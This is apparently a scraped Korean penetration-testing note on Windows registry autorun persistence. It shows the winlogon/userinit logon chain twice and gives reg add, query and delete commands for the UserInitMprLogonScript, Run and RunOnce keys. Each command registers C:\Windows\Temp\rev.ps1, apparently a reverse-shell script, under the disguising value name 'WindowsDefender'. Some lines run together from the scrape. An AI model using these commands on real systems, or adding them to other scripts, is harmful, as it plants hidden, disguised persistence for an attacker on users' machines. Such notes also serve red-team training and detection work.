Registry AutoRun
경로
실행
logon process
↓
winlogon.exe
↓
userinit.exe
├─ 실행: UserInitMprLogonScript
└─ 실행: explorer.exe
↓
└─ 실행: Run / RunOnceAbuse
Last updated
logon process
↓
winlogon.exe
↓
userinit.exe
├─ 실행: UserInitMprLogonScript
└─ 실행: explorer.exe
↓
└─ 실행: Run / RunOnceLast updated
# 레지스트리에 파일 등록
reg add "HKCU\Environment\UserInitMprLogonScript" /v "WindowsDefender" /t REG_SZ /d "C:\Windows\Temp\rev.ps1" /f
# 등록된 레지스트리 키 확인
reg query "HKCU\Environment\UserInitMprLogonScript"
# 등록된 레지스트리 키 삭제
reg delete "HKCU\Environment\UserInitMprLogonScript" /v "WindowsDefender" /f # 레지스트리에 파일 등록
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /t REG_SZ /d "C:\Windows\Temp\rev.ps1" /f
# 등록된 레지스트리 키 확인
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
# 등록된 레지스트리 키 삭제
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f# 레지스트리에 파일 등록
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v "WindowsDefender" /t REG_SZ /d "C:\Windows\Temp\rev.ps1" /f
# 등록된 레지스트리 키 확인
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"
# 등록된 레지스트리 키 삭제
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v "WindowsDefender" /f